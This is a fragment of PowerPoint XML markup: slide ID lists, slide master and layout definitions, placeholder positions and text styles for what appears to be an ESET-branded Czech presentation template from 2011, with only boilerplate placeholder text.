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7" r:id="rId2"/>
    <p:sldMasterId id="2147483708" r:id="rId3"/>
    <p:sldMasterId id="2147483721" r:id="rId4"/>
    <p:sldMasterId id="2147483733" r:id="rId5"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId63"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId64"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="262" r:id="rId6"/>
    <p:sldId id="351" r:id="rId7"/>
    <p:sldId id="350" r:id="rId8"/>
    <p:sldId id="366" r:id="rId9"/>
    <p:sldId id="367" r:id="rId10"/>
    <p:sldId id="368" r:id="rId11"/>
    <p:sldId id="369" r:id="rId12"/>
    <p:sldId id="375" r:id="rId13"/>
    <p:sldId id="376" r:id="rId14"/>
    <p:sldId id="370" r:id="rId15"/>
    <p:sldId id="371" r:id="rId16"/>
    <p:sldId id="372" r:id="rId17"/>
    <p:sldId id="373" r:id="rId18"/>
    <p:sldId id="374" r:id="rId19"/>
    <p:sldId id="378" r:id="rId20"/>
    <p:sldId id="377" r:id="rId21"/>
    <p:sldId id="360" r:id="rId22"/>
    <p:sldId id="411" r:id="rId23"/>
    <p:sldId id="379" r:id="rId24"/>
    <p:sldId id="380" r:id="rId25"/>
    <p:sldId id="381" r:id="rId26"/>
    <p:sldId id="265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413" r:id="rId37"/>
    <p:sldId id="414" r:id="rId38"/>
    <p:sldId id="403" r:id="rId39"/>
    <p:sldId id="391" r:id="rId40"/>
    <p:sldId id="392" r:id="rId41"/>
    <p:sldId id="393" r:id="rId42"/>
    <p:sldId id="394" r:id="rId43"/>
    <p:sldId id="395" r:id="rId44"/>
    <p:sldId id="356" r:id="rId45"/>
    <p:sldId id="406" r:id="rId46"/>
    <p:sldId id="326" r:id="rId47"/>
    <p:sldId id="339" r:id="rId48"/>
    <p:sldId id="416" r:id="rId49"/>
    <p:sldId id="324" r:id="rId50"/>
    <p:sldId id="415" r:id="rId51"/>
    <p:sldId id="407" r:id="rId52"/>
    <p:sldId id="291" r:id="rId53"/>
    <p:sldId id="288" r:id="rId54"/>
    <p:sldId id="412" r:id="rId55"/>
    <p:sldId id="306" r:id="rId56"/>
    <p:sldId id="307" r:id="rId57"/>
    <p:sldId id="345" r:id="rId58"/>
    <p:sldId id="347" r:id="rId59"/>
    <p:sldId id="409" r:id="rId60"/>
    <p:sldId id="410" r:id="rId61"/>
    <p:sldId id="353" r:id="rId6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472" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="72" d="100"/>
          <a:sy n="72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6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9BF62B-2DAC-4681-83F0-89106A916F85}" type="datetimeFigureOut">
              <a:rPr lang="cs-CZ"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>9.11.2011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5D692C-C9D2-4476-A8C2-F1050E83DE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55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59163-1A18-4D4F-9FE5-6676E1764584}" type="datetimeFigureOut">
              <a:rPr lang="cs-CZ" smtClean="0"/>
              <a:pPr/>
              <a:t>9.11.2011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3E2F1-6C72-4BDE-B2A7-CB09961FD0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6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57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E2F1-6C72-4BDE-B2A7-CB09961FD07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Row Title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set---logo---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70501"/>
            <a:ext cx="7709652" cy="4525963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- Colum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214314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071810"/>
            <a:ext cx="3709124" cy="322465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3071810"/>
            <a:ext cx="3714776" cy="322465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135732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- Compars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214314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857628"/>
            <a:ext cx="3709124" cy="235745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3842203"/>
            <a:ext cx="3714776" cy="237287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3056384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3056384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714348" y="1214422"/>
            <a:ext cx="7786742" cy="135732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-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214314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071810"/>
            <a:ext cx="5280760" cy="322465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3071810"/>
            <a:ext cx="2214578" cy="3224654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135732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trip -  Gener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929066"/>
            <a:ext cx="7709652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trip -  Colum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929066"/>
            <a:ext cx="3709124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3929066"/>
            <a:ext cx="3714776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trip -  Compars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730310"/>
            <a:ext cx="3709124" cy="1341896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14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4714885"/>
            <a:ext cx="3714776" cy="135732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14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3929066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18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3929066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18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trip - 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929066"/>
            <a:ext cx="5280760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3929066"/>
            <a:ext cx="2214578" cy="2367398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trip - Gener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0"/>
            <a:ext cx="7709652" cy="500066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trip - Colum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1"/>
            <a:ext cx="3709124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928671"/>
            <a:ext cx="3714776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trip - Compars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29914"/>
            <a:ext cx="3709124" cy="421484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1714489"/>
            <a:ext cx="3714776" cy="421484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928670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928670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Row Title -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70501"/>
            <a:ext cx="3709124" cy="4525963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1770501"/>
            <a:ext cx="3714776" cy="4525963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trip -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1"/>
            <a:ext cx="5280760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928671"/>
            <a:ext cx="2214578" cy="5000659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 - Gener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0"/>
            <a:ext cx="7709652" cy="500066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 - Colum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1"/>
            <a:ext cx="3709124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928671"/>
            <a:ext cx="3714776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 - Compars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29914"/>
            <a:ext cx="3709124" cy="421484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1714489"/>
            <a:ext cx="3714776" cy="421484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928670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928670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 -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1"/>
            <a:ext cx="5280760" cy="500066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928671"/>
            <a:ext cx="2214578" cy="5000660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2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="642910" y="50005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500063" y="1857375"/>
            <a:ext cx="8143875" cy="32861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5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2357430"/>
            <a:ext cx="7772400" cy="3357586"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="0"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="4000" spc="0"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714348" y="1285861"/>
            <a:ext cx="7786715" cy="1000131"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b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714375" y="3000372"/>
            <a:ext cx="7786688" cy="2714628"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr kumimoji="0" lang="cs-CZ" sz="1500" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Fedra Sans Alt Pro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Row Title - Compa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eset---logo---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587170"/>
            <a:ext cx="3709124" cy="342902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2571745"/>
            <a:ext cx="3714776" cy="342902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1785926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1785926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eset---logo-with-claim---bi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ow Title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set---logo---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70501"/>
            <a:ext cx="7709652" cy="4525963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ow Title -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70501"/>
            <a:ext cx="3709124" cy="4525963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1770501"/>
            <a:ext cx="3714776" cy="4525963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ow Title - Compa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eset---logo---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587170"/>
            <a:ext cx="3709124" cy="342902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2571745"/>
            <a:ext cx="3714776" cy="342902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1785926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1785926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ow Titl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70501"/>
            <a:ext cx="5280760" cy="4525963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1770501"/>
            <a:ext cx="2214578" cy="4525963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Title - Gener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128588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14554"/>
            <a:ext cx="7709652" cy="4097335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Title - Colum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128588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14554"/>
            <a:ext cx="3709124" cy="408191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2214554"/>
            <a:ext cx="3714776" cy="408191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Title - Compars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128588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015798"/>
            <a:ext cx="3709124" cy="3127846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3000373"/>
            <a:ext cx="3714776" cy="314327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2214554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2214554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Title -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128588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14554"/>
            <a:ext cx="5280760" cy="408191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2214554"/>
            <a:ext cx="2214578" cy="4081910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- Gener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214314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071810"/>
            <a:ext cx="7709652" cy="322465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1357323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Row Titl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70501"/>
            <a:ext cx="5280760" cy="4525963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1770501"/>
            <a:ext cx="2214578" cy="4525963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- Colum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214314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071810"/>
            <a:ext cx="3709124" cy="322465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3071810"/>
            <a:ext cx="3714776" cy="322465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1357323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- Compars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214314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857628"/>
            <a:ext cx="3709124" cy="235745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3842203"/>
            <a:ext cx="3714776" cy="237287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3056384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3056384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714348" y="1214422"/>
            <a:ext cx="7786742" cy="1357323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-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214314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071810"/>
            <a:ext cx="5280760" cy="322465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3071810"/>
            <a:ext cx="2214578" cy="3224654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1357323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trip -  Gener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929066"/>
            <a:ext cx="7709652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trip -  Colum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929066"/>
            <a:ext cx="3709124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3929066"/>
            <a:ext cx="3714776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trip -  Compars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730310"/>
            <a:ext cx="3709124" cy="1341896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14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4714885"/>
            <a:ext cx="3714776" cy="135732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14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3929066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18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3929066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18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trip - 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929066"/>
            <a:ext cx="5280760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3929066"/>
            <a:ext cx="2214578" cy="2367398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- General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0"/>
            <a:ext cx="7709652" cy="500066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- Column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1"/>
            <a:ext cx="3709124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928671"/>
            <a:ext cx="3714776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- Compars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29914"/>
            <a:ext cx="3709124" cy="421484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1714489"/>
            <a:ext cx="3714776" cy="421484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928670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928670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Rows Title - Gener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128588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14554"/>
            <a:ext cx="7709652" cy="4097335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-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1"/>
            <a:ext cx="5280760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928671"/>
            <a:ext cx="2214578" cy="5000659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5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2357430"/>
            <a:ext cx="7772400" cy="3357586"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="0"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="4000" spc="0"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714348" y="1285861"/>
            <a:ext cx="7786715" cy="1000131"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b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714375" y="3000372"/>
            <a:ext cx="7786688" cy="2714628"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr kumimoji="0" lang="cs-CZ" sz="1500" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Fedra Sans Alt Pro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eset---logo-with-claim---bi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trip -  General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set---logo---gray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929066"/>
            <a:ext cx="7709652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trip -  Column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929066"/>
            <a:ext cx="3709124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3929066"/>
            <a:ext cx="3714776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trip -  Compars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eset---logo---gray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730310"/>
            <a:ext cx="3709124" cy="1341896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14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4714885"/>
            <a:ext cx="3714776" cy="135732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14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14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3929066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18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3929066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18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11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trip - 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929066"/>
            <a:ext cx="5280760" cy="2367398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3929066"/>
            <a:ext cx="2214578" cy="2367398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3000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2214578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- Gener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0"/>
            <a:ext cx="7709652" cy="500066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- Colum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1"/>
            <a:ext cx="3709124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928671"/>
            <a:ext cx="3714776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Rows Title - Colum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128588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14554"/>
            <a:ext cx="3709124" cy="408191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2214554"/>
            <a:ext cx="3714776" cy="408191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- Compars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29914"/>
            <a:ext cx="3709124" cy="421484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1714489"/>
            <a:ext cx="3714776" cy="421484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928670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928670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rip -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1"/>
            <a:ext cx="5280760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928671"/>
            <a:ext cx="2214578" cy="5000659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- Gener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0"/>
            <a:ext cx="7709652" cy="500066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- Column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1"/>
            <a:ext cx="3709124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928671"/>
            <a:ext cx="3714776" cy="5000659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- Compars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1729914"/>
            <a:ext cx="3709124" cy="421484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1714489"/>
            <a:ext cx="3714776" cy="421484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928670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928670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-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928671"/>
            <a:ext cx="5280760" cy="500066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928671"/>
            <a:ext cx="2214578" cy="5000660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5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2357430"/>
            <a:ext cx="7772400" cy="3357586"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="0"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="4000" spc="0"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714348" y="1285861"/>
            <a:ext cx="7786715" cy="1000131"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b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714375" y="3000372"/>
            <a:ext cx="7786688" cy="2714628"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr kumimoji="0" lang="cs-CZ" sz="1500" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Fedra Sans Alt Pro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eset---logo-with-claim---bi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2357430"/>
            <a:ext cx="7772400" cy="3357586"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="0"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="4000" spc="0"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714348" y="1285861"/>
            <a:ext cx="7786715" cy="1000131"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b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714375" y="3000372"/>
            <a:ext cx="7786688" cy="2714628"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr kumimoji="0" lang="cs-CZ" sz="1500" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Fedra Sans Alt Pro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Rows Title - Compars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128588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015798"/>
            <a:ext cx="3709124" cy="3127846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4" y="3000373"/>
            <a:ext cx="3714776" cy="3143271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1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714348" y="2214554"/>
            <a:ext cx="3714776" cy="639762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="73152" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr sz="2200" b="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Fedra Sans Alt Pro Medium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6314" y="2214554"/>
            <a:ext cx="3716235" cy="639762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="73152" indent="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:buNone/>
              <a:defRPr kumimoji="0" lang="cs-CZ" sz="2200" b="0" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Fedra Sans Alt Pro Medium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eset---logo-with-claim---bi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eset---logo-with-claim---big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eset---logo-with-claim---big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eset---logo-with-claim---big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eset---logo-with-claim---big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0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0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Rows Title -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128588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14554"/>
            <a:ext cx="5280760" cy="4081910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86512" y="2214554"/>
            <a:ext cx="2214578" cy="4081910"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0"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180000" algn="l" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"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0" algn="l" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr kumimoji="0" lang="cs-CZ" sz="16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0" algn="l" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr kumimoji="0" lang="en-US" sz="16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ázek s titulkem">
    <p:bg>
      <p:bgPr>
        <a:blipFill dpi="0" rotWithShape="1">
          <a:blip r:embed="rId2" cstate="print">
            <a:lum/>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect l="75000" t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7158" y="585312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Europ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orld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Europe - blac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orld - blac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5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2357430"/>
            <a:ext cx="7772400" cy="3357586"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="0"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="4000" spc="0"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714348" y="1285861"/>
            <a:ext cx="7786715" cy="1000131"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b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714375" y="3000372"/>
            <a:ext cx="7786688" cy="2714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kumimoji="0" lang="cs-CZ" sz="1500" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Fedra Sans Alt Pro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4286250"/>
            <a:ext cx="77724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eset---logo-with-claim---bi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929066"/>
            <a:ext cx="7772400" cy="2357454"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr t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4429132"/>
            <a:ext cx="7781090" cy="1867332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeo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None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- Gener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set---logo--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25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8604"/>
            <a:ext cx="7772400" cy="214314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3071810"/>
            <a:ext cx="7709652" cy="3224654"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1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180000" algn="l" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr kumimoji="0" lang="cs-CZ" sz="2200" kern="12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180000" algn="l" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr kumimoji="0" lang="en-US" sz="2200" kern="120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714348" y="1214422"/>
            <a:ext cx="7786742" cy="135732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720725" y="428625"/>
            <a:ext cx="7772400" cy="857250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="288000" rIns="0" bIns="0" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:extLst/>
          </a:lstStyle>
          <a:p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720725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First level content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="cs-CZ" smtClean="0"/>
              <a:t>Second level content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="cs-CZ" smtClean="0"/>
              <a:t>Third level content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="cs-CZ" smtClean="0"/>
              <a:t>Fourth level content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="cs-CZ" smtClean="0"/>
              <a:t>Fifth level content</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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720725" y="6416675"/>
            <a:ext cx="5562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  <p:sldLayoutId id="2147484910" r:id="rId12"/>
    <p:sldLayoutId id="2147484911" r:id="rId13"/>
    <p:sldLayoutId id="2147484912" r:id="rId14"/>
    <p:sldLayoutId id="2147484913" r:id="rId15"/>
    <p:sldLayoutId id="2147484914" r:id="rId16"/>
    <p:sldLayoutId id="2147484915" r:id="rId17"/>
    <p:sldLayoutId id="2147484916" r:id="rId18"/>
    <p:sldLayoutId id="2147484917" r:id="rId19"/>
    <p:sldLayoutId id="2147484918" r:id="rId20"/>
    <p:sldLayoutId id="2147484919" r:id="rId21"/>
    <p:sldLayoutId id="2147484920" r:id="rId22"/>
    <p:sldLayoutId id="2147484921" r:id="rId23"/>
    <p:sldLayoutId id="2147484922" r:id="rId24"/>
    <p:sldLayoutId id="2147484923" r:id="rId25"/>
    <p:sldLayoutId id="2147484924" r:id="rId26"/>
    <p:sldLayoutId id="2147484925" r:id="rId27"/>
    <p:sldLayoutId id="2147484926" r:id="rId28"/>
    <p:sldLayoutId id="2147484989" r:id="rId29"/>
    <p:sldLayoutId id="2147484990" r:id="rId3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-100">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Fedra Sans Alt Pro Medium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9pPr>
      <a:extLst/>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="179388" indent="-179388" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPts val="7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3pPr>
      <a:lvl4pPr marL="719138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4pPr>
      <a:lvl5pPr marL="898525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720725" y="428625"/>
            <a:ext cx="7772400" cy="857250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="288000" rIns="0" bIns="0" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:extLst/>
          </a:lstStyle>
          <a:p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2051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720725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First level content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="cs-CZ" smtClean="0"/>
              <a:t>Second level content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="cs-CZ" smtClean="0"/>
              <a:t>Third level content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="cs-CZ" smtClean="0"/>
              <a:t>Fourth level content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="cs-CZ" smtClean="0"/>
              <a:t>Fifth level content</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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720725" y="6416675"/>
            <a:ext cx="5562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  <p:sldLayoutId id="2147484938" r:id="rId12"/>
    <p:sldLayoutId id="2147484939" r:id="rId13"/>
    <p:sldLayoutId id="2147484940" r:id="rId14"/>
    <p:sldLayoutId id="2147484941" r:id="rId15"/>
    <p:sldLayoutId id="2147484942" r:id="rId16"/>
    <p:sldLayoutId id="2147484943" r:id="rId17"/>
    <p:sldLayoutId id="2147484944" r:id="rId18"/>
    <p:sldLayoutId id="2147484945" r:id="rId19"/>
    <p:sldLayoutId id="2147484946" r:id="rId20"/>
    <p:sldLayoutId id="2147484991" r:id="rId21"/>
    <p:sldLayoutId id="2147484992" r:id="rId22"/>
    <p:sldLayoutId id="2147484993" r:id="rId2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-100">
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:latin typeface="Fedra Sans Alt Pro Medium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edra Sans Alt Pro Medium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edra Sans Alt Pro Medium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edra Sans Alt Pro Medium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edra Sans Alt Pro Medium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edra Sans Alt Pro Medium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edra Sans Alt Pro Medium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edra Sans Alt Pro Medium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Fedra Sans Alt Pro Medium"/>
        </a:defRPr>
      </a:lvl9pPr>
      <a:extLst/>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="179388" indent="-179388" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPts val="7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200" kern="1200">
          <a:solidFill>
            <a:srgbClr val="777777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777777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777777"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="719138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777777"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="898525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777777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720725" y="428625"/>
            <a:ext cx="7772400" cy="857250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="288000" rIns="0" bIns="0" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:extLst/>
          </a:lstStyle>
          <a:p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720725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First level content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="cs-CZ" smtClean="0"/>
              <a:t>Second level content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="cs-CZ" smtClean="0"/>
              <a:t>Third level content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="cs-CZ" smtClean="0"/>
              <a:t>Fourth level content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="cs-CZ" smtClean="0"/>
              <a:t>Fifth level content</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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720725" y="6416675"/>
            <a:ext cx="5562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sk-SK"/>
              <a:t>Footer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47" r:id="rId1"/>
    <p:sldLayoutId id="2147484948" r:id="rId2"/>
    <p:sldLayoutId id="2147484949" r:id="rId3"/>
    <p:sldLayoutId id="2147484950" r:id="rId4"/>
    <p:sldLayoutId id="2147484951" r:id="rId5"/>
    <p:sldLayoutId id="2147484952" r:id="rId6"/>
    <p:sldLayoutId id="2147484953" r:id="rId7"/>
    <p:sldLayoutId id="2147484954" r:id="rId8"/>
    <p:sldLayoutId id="2147484955" r:id="rId9"/>
    <p:sldLayoutId id="2147484956" r:id="rId10"/>
    <p:sldLayoutId id="2147484957" r:id="rId11"/>
    <p:sldLayoutId id="2147484958" r:id="rId12"/>
    <p:sldLayoutId id="2147484994" r:id="rId13"/>
    <p:sldLayoutId id="2147484995" r:id="rId14"/>
    <p:sldLayoutId id="2147484996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-100">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Fedra Sans Alt Pro Medium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9pPr>
      <a:extLst/>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="179388" indent="-179388" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPts val="7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200" kern="1200">
          <a:solidFill>
            <a:srgbClr val="D0D6DA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rgbClr val="D0D6DA"/>
        </a:buClr>
        <a:buSzPct val="100000"/>
        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
        <a:buChar char="•"/>
        <a:defRPr sz="2200" kern="1200">
          <a:solidFill>
            <a:srgbClr val="D0D6DA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D0D6DA"/>
        </a:buClr>
        <a:buSzPct val="100000"/>
        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
        <a:buChar char="•"/>
        <a:defRPr sz="2200" kern="1200">
          <a:solidFill>
            <a:srgbClr val="D0D6DA"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="719138" indent="-179388" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:srgbClr val="D0D6DA"/>
        </a:buClr>
        <a:buSzPct val="100000"/>
        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
        <a:buChar char="•"/>
        <a:defRPr sz="2200" kern="1200">
          <a:solidFill>
            <a:srgbClr val="D0D6DA"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="898525" indent="-179388" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:srgbClr val="D0D6DA"/>
        </a:buClr>
        <a:buSzPct val="100000"/>
        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
        <a:buChar char="•"/>
        <a:defRPr sz="2200" kern="1200">
          <a:solidFill>
            <a:srgbClr val="D0D6DA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720725" y="4286250"/>
            <a:ext cx="7772400" cy="857250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="288000" rIns="0" bIns="0" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:extLst/>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1" smtClean="0"/>
              <a:t>Title</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="409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720725" y="5072063"/>
            <a:ext cx="77724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First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  <p:sldLayoutId id="2147484897" r:id="rId12"/>
    <p:sldLayoutId id="2147484898" r:id="rId13"/>
    <p:sldLayoutId id="2147484970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-100">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Fedra Sans Alt Pro Medium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9pPr>
      <a:extLst/>
    </p:titleStyle>
    <p:bodyStyle>
